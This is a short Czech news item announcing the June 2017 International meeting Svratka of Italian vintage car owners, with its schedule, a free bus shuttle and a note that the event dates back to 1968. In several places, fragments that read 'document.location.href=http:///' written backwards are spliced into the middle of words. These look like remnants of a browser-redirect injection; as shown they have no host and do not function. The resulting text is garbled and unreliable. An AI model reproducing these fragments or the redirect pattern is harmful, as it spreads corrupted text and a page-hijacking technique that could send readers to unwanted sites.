Rainbow page separator

Do Svratky se po roce opět sjedou nablýskané italské veterány

Středa, 31. května 2017

Svratka / Další setkání majitelů italských his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torických au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů International meeting Svratka 2017 se v sobotu 10. června uskuteční ve Svratce. Mezi osmou a jedenác[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou hodinou se naplánován příjezd a prezentace účastníků srazu na tamním náměstí 9. května, poté se přesunou do areálu hotelu Svratka. Lidé si mohou nablýskané veterány prohlédnout jak přímo na náměstí při příjezdu, tak i později u hotelu, kde se v poledne uskuteční slavnostní zahájení srazu a následně i retro módní přehlídka.
Soutěžní odpoledne, kterého se mohou zúčastnit všichni příchozí, začne krátce po jedné hodině odpoledne a potrvá do půl páté. Spojení mezi náměstím 9. května a hotelem bude pro zájemce zdarma zajišťovat au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobus Škoda 706 RTO.
Obnovený sraz majitelů italských vozidel se ve Svratce po pětačtyřiceti letech uskutečnil v roce 2013, od té doby přerušená tradice pokračuje. Setkání se účastní i řada au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilistů, kteří byli aktéry první akce s názvem International meeting Svratka 1968.